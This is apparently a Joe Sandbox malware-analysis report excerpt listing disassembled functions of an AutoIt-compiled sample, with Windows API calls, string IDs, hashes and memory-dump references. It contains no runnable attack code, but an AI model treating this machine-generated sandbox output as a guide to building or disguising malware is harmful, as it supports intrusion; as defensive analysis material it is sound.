                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                      • API String ID: 2910397461-517079104
                      • Opcode ID: 39130e6e25830354a62f75781cb40fd4e4f8378a991d7811c774434fd18091c6
                      • Instruction ID: a65668349d9d90c20bc2e89cb33f711f17b366ce89c6f6fccfd6c75f405f0b1e
                      • Opcode Fuzzy Hash: 39130e6e25830354a62f75781cb40fd4e4f8378a991d7811c774434fd18091c6
                      • Instruction Fuzzy Hash: C2A18371A00605BFEB14DBA4DC49FAE7BB9EB04714F008129FA14A72E1C774AD44CB68
                      Function 0046AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                      Download Yara Rule
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 0046AD1E
                      • GetDriveTypeW.KERNEL32(?,0048FAC0,?,\\.\,0048F910), ref: 0046ADFB
                      • SetErrorMode.KERNEL32(00000000,0048FAC0,?,\\.\,0048F910), ref: 0046AF59
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ErrorMode$DriveType
                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                      • API String ID: 2907320926-4222207086
                      • Opcode ID: d4d08640f91872c216ba8f74001c93904258f000dd65fb750c1087d08048f0fa
                      • Instruction ID: e912c7b3330773d5b9bf2588ba7fbd63f6bfe130c5f6eb3342ce3002eb002758
                      • Opcode Fuzzy Hash: d4d08640f91872c216ba8f74001c93904258f000dd65fb750c1087d08048f0fa
                      • Instruction Fuzzy Hash: 2E5186B0648A059ACB04DB61C942DBE73A5EF48708730446FF406B7291EA3DAD62DF5F
                      Function 004068DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: __wcsnicmp
                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                      • API String ID: 1038674560-86951937
                      • Opcode ID: 3cacba058254b3238dd2174b4c1972a88315ba911dd2d5784c2a2e9dd56d3911
                      • Instruction ID: cb422ad940ebd99c4cbaeb9a9904d1c86e4c1b178c3cf2ebe63a60ccd5d4c750
                      • Opcode Fuzzy Hash: 3cacba058254b3238dd2174b4c1972a88315ba911dd2d5784c2a2e9dd56d3911
                      • Instruction Fuzzy Hash: 3281E3B07002156ADF10BA62EC42FAB3768AF15704F14403BF9067A1C2EB7CDA55C66D
                      Function 0048A8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetSysColor.USER32(00000012), ref: 0048A903
                      • SetTextColor.GDI32(?,?), ref: 0048A907
                      • GetSysColorBrush.USER32(0000000F), ref: 0048A91D
                      • GetSysColor.USER32(0000000F), ref: 0048A928
                      • CreateSolidBrush.GDI32(?), ref: 0048A92D
                      • GetSysColor.USER32(00000011), ref: 0048A945
                      • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048A953
                      • SelectObject.GDI32(?,00000000), ref: 0048A964
                      • SetBkColor.GDI32(?,00000000), ref: 0048A96D
                      • SelectObject.GDI32(?,?), ref: 0048A97A
                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0048A999
                      • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048A9B0
                      • GetWindowLongW.USER32(00000000,000000F0), ref: 0048A9C5
                      • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048A9ED
                      • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0048AA14
                      • InflateRect.USER32(?,000000FD,000000FD), ref: 0048AA32
                      • DrawFocusRect.USER32(?,?), ref: 0048AA3D
                      • GetSysColor.USER32(00000011), ref: 0048AA4B
                      • SetTextColor.GDI32(?,00000000), ref: 0048AA53
                      • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0048AA67
                      • SelectObject.GDI32(?,0048A5FA), ref: 0048AA7E
                      • DeleteObject.GDI32(?), ref: 0048AA89
                      • SelectObject.GDI32(?,?), ref: 0048AA8F
                      • DeleteObject.GDI32(?), ref: 0048AA94
                      • SetTextColor.GDI32(?,?), ref: 0048AA9A
                      • SetBkColor.GDI32(?,?), ref: 0048AAA4
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                      • String ID:
                      • API String ID: 1996641542-0
                      • Opcode ID: 694946cc6e67fe786b141e761a5a44e56aae5e79ce6f6dba3698824a9b67d4c5
                      • Instruction ID: 67910f5981194f54d32d2413a419bc6a22b5e02dd88e552ef27f67441b011758
                      • Opcode Fuzzy Hash: 694946cc6e67fe786b141e761a5a44e56aae5e79ce6f6dba3698824a9b67d4c5
                      • Instruction Fuzzy Hash: AD514F71901208FFDB10AFA4DC48EAE7B79EF08320F114A2AF911AB2A1D7759D54DF54
                      Function 004889D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00488AC1
                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488AD2
                      • CharNextW.USER32(0000014E), ref: 00488B01
                      • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00488B42
                      • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00488B58
                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00488B69
                      • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00488B86
                      • SetWindowTextW.USER32(?,0000014E), ref: 00488BD8
                      • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00488BEE
                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00488C1F
                      • _memset.LIBCMT ref: 00488C44
                      • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00488C8D
                      • _memset.LIBCMT ref: 00488CEC
                      • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00488D16
                      • SendMessageW.USER32(?,00001074,?,00000001), ref: 00488D6E
                      • SendMessageW.USER32(?,0000133D,?,?), ref: 00488E1B
                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00488E3D
                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488E87
                      • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00488EB4
                      • DrawMenuBar.USER32(?), ref: 00488EC3
                      • SetWindowTextW.USER32(?,0000014E), ref: 00488EEB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                      • String ID: 0
                      • API String ID: 1073566785-4108050209
                      • Opcode ID: 34291efbb9a5d2a10ac76ec0c270521a8124600f2d75c4455e21dd13b58d0ff0
                      • Instruction ID: 787a5fb712104ee4b76f4ba17aa60975d6cacfa81cf9944a1fa1b3bb2a4fb8ea
                      • Opcode Fuzzy Hash: 34291efbb9a5d2a10ac76ec0c270521a8124600f2d75c4455e21dd13b58d0ff0
                      • Instruction Fuzzy Hash: 44E1B370900218AFDB20AF51CC84EEF7BB9EF04710F50456FFA15AA290DB789985DF69
                      Function 0048488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetCursorPos.USER32(?), ref: 004849CA
                      • GetDesktopWindow.USER32 ref: 004849DF
                      • GetWindowRect.USER32(00000000), ref: 004849E6
                      • GetWindowLongW.USER32(?,000000F0), ref: 00484A48
                      • DestroyWindow.USER32(?), ref: 00484A74
                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00484A9D
                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00484ABB
                      • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00484AE1
                      • SendMessageW.USER32(?,00000421,?,?), ref: 00484AF6
                      • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00484B09
                      • IsWindowVisible.USER32(?), ref: 00484B29
                      • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00484B44
                      • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00484B58
                      • GetWindowRect.USER32(?,?), ref: 00484B70
                      • MonitorFromPoint.USER32(?,?,00000002), ref: 00484B96
                      • GetMonitorInfoW.USER32(00000000,?), ref: 00484BB0
                      • CopyRect.USER32(?,?), ref: 00484BC7
                      • SendMessageW.USER32(?,00000412,00000000), ref: 00484C32
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                      • String ID: ($0$tooltips_class32
                      • API String ID: 698492251-4156429822
                      • Opcode ID: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
                      • Instruction ID: 71fd3677379c23cac636b4aadb2286f0fe2b453109396d863f09e4e9c2446b6d
                      • Opcode Fuzzy Hash: 943f141a24a5701e169943524c067f38581a5f413d5e7729d13daee1db30ced1
                      • Instruction Fuzzy Hash: EFB15971604341AFDB04EF65C844A6FBBE4BF88314F008A2EF999AB291D775EC05CB59
                      Function 0046449A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                      Download Yara Rule
                      APIs
                      • GetFileVersionInfoSizeW.VERSION(?,?), ref: 004644AC
                      • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 004644D2
                      • _wcscpy.LIBCMT ref: 00464500
                      • _wcscmp.LIBCMT ref: 0046450B
                      • _wcscat.LIBCMT ref: 00464521
                      • _wcsstr.LIBCMT ref: 0046452C
                      • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00464548
                      • _wcscat.LIBCMT ref: 00464591
                      • _wcscat.LIBCMT ref: 00464598
                      • _wcsncpy.LIBCMT ref: 004645C3
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                      • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                      • API String ID: 699586101-1459072770
                      • Opcode ID: f5e5018a0ed040561f79e9b5c06771cacad600aedc532658bf007cd18df33af5
                      • Instruction ID: 2b480a1fb6a64e9c247c6b56b60e40bdc72f3d5a191167641815a527c939035c
                      • Opcode Fuzzy Hash: f5e5018a0ed040561f79e9b5c06771cacad600aedc532658bf007cd18df33af5
                      • Instruction Fuzzy Hash: 7641D431A002107BDB14BA75AC43FBF77ACDF81714F50046FF905A6182FA7C9A4296AE
                      Function 004027D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                      Download Yara Rule
                      APIs
                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028BC
                      • GetSystemMetrics.USER32(00000007), ref: 004028C4
                      • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028EF
                      • GetSystemMetrics.USER32(00000008), ref: 004028F7
                      • GetSystemMetrics.USER32(00000004), ref: 0040291C
                      • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00402939
                      • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00402949
                      • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0040297C
                      • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00402990
                      • GetClientRect.USER32(00000000,000000FF), ref: 004029AE
                      • GetStockObject.GDI32(00000011), ref: 004029CA
                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 004029D5
                        • Part of subcall function 00402344: GetCursorPos.USER32(?), ref: 00402357
                        • Part of subcall function 00402344: ScreenToClient.USER32(004C57B0,?), ref: 00402374
                        • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000001), ref: 00402399
                        • Part of subcall function 00402344: GetAsyncKeyState.USER32(00000002), ref: 004023A7
                      • SetTimer.USER32(00000000,00000000,00000028,00401256), ref: 004029FC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                      • String ID: AutoIt v3 GUI
                      • API String ID: 1458621304-248962490
                      • Opcode ID: df8829e052d7c40840cee99ca6260df0de385842cec2d42fdc9bfdfb12db4f5c
                      • Instruction ID: a18fd751d40b92a0f9ce74f9a4650c687106778ef47aaf7a4e9f1722fdb5861d
                      • Opcode Fuzzy Hash: df8829e052d7c40840cee99ca6260df0de385842cec2d42fdc9bfdfb12db4f5c
                      • Instruction Fuzzy Hash: 8AB15075600209EFDB14EFA8DD49BAE77B4FB08314F10463AFA15A62D0DB78A851CB58
                      Function 0045A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                      Download Yara Rule
                      APIs
                      • GetClassNameW.USER32(?,?,00000100), ref: 0045A47A
                      • __swprintf.LIBCMT ref: 0045A51B
                      • _wcscmp.LIBCMT ref: 0045A52E
                      • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0045A583
                      • _wcscmp.LIBCMT ref: 0045A5BF
                      • GetClassNameW.USER32(?,?,00000400), ref: 0045A5F6
                      • GetDlgCtrlID.USER32(?), ref: 0045A648
                      • GetWindowRect.USER32(?,?), ref: 0045A67E
                      • GetParent.USER32(?), ref: 0045A69C
                      • ScreenToClient.USER32(00000000), ref: 0045A6A3
                      • GetClassNameW.USER32(?,?,00000100), ref: 0045A71D
                      • _wcscmp.LIBCMT ref: 0045A731
                      • GetWindowTextW.USER32(?,?,00000400), ref: 0045A757
                      • _wcscmp.LIBCMT ref: 0045A76B
                        • Part of subcall function 0042362C: _iswctype.LIBCMT ref: 00423634
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                      • String ID: %s%u
                      • API String ID: 3744389584-679674701
                      • Opcode ID: 22f345dc1749fc61d738452cff1ec01fec5d702c3361f6a434a16c0623e3483b
                      • Instruction ID: eb4c2c17bfd361fdb29ac4d9e78bc58de04dd0089fb3858937583b9ed20721cb
                      • Opcode Fuzzy Hash: 22f345dc1749fc61d738452cff1ec01fec5d702c3361f6a434a16c0623e3483b
                      • Instruction Fuzzy Hash: 06A1B431204606BFD714DF60C884BABB7E8FF44316F04462AFD99D2251D738E969CB9A
                      Function 0045AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                      Download Yara Rule
                      APIs
                      • GetClassNameW.USER32(00000008,?,00000400), ref: 0045AF18
                      • _wcscmp.LIBCMT ref: 0045AF29
                      • GetWindowTextW.USER32(00000001,?,00000400), ref: 0045AF51
                      • CharUpperBuffW.USER32(?,00000000), ref: 0045AF6E
                      • _wcscmp.LIBCMT ref: 0045AF8C
                      • _wcsstr.LIBCMT ref: 0045AF9D
                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0045AFD5
                      • _wcscmp.LIBCMT ref: 0045AFE5
                      • GetWindowTextW.USER32(00000002,?,00000400), ref: 0045B00C
                      • GetClassNameW.USER32(00000018,?,00000400), ref: 0045B055
                      • _wcscmp.LIBCMT ref: 0045B065
                      • GetClassNameW.USER32(00000010,?,00000400), ref: 0045B08D
                      • GetWindowRect.USER32(00000004,?), ref: 0045B0F6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                      • String ID: @$ThumbnailClass
                      • API String ID: 1788623398-1539354611
                      • Opcode ID: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
                      • Instruction ID: 2113ca19c953e4d0fb0a3bed3b629d6a09082ecb25fab152276a3acc7fd757eb
                      • Opcode Fuzzy Hash: 669bc5d2a5c452374ee22981f9444d8d68a805a8765a871b1b4bd50104187170
                      • Instruction Fuzzy Hash: BD81CF711082059BDB00DF11C881BAB77E8EF4075AF14856FFD859A192DB38DD4DCBAA
                      Function 0048C5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                      • DragQueryPoint.SHELL32(?,?), ref: 0048C627
                        • Part of subcall function 0048AB37: ClientToScreen.USER32(?,?), ref: 0048AB60
                        • Part of subcall function 0048AB37: GetWindowRect.USER32(?,?), ref: 0048ABD6
                        • Part of subcall function 0048AB37: PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C690
                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0048C69B
                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0048C6BE
                      • _wcscat.LIBCMT ref: 0048C6EE
                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0048C705
                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0048C71E
                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C735
                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0048C757
                      • DragFinish.SHELL32(?), ref: 0048C75E
                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0048C851
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbL
                      • API String ID: 169749273-3863044002
                      • Opcode ID: fe787714386ed1c3ddd4163c3f5535821c598f5dfa6e15062804bbb5d4f1b538
                      • Instruction ID: 4fadb8ae9d86136d60326728fb0320be203031e120dd753c2ba31efb77555f42
                      • Opcode Fuzzy Hash: fe787714386ed1c3ddd4163c3f5535821c598f5dfa6e15062804bbb5d4f1b538
                      • Instruction Fuzzy Hash: 1B617F71108300AFC701EF65CC85D9FBBE8EF88714F50092EF591A22A1DB74A949CB6A
                      Function 0045ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: __wcsnicmp
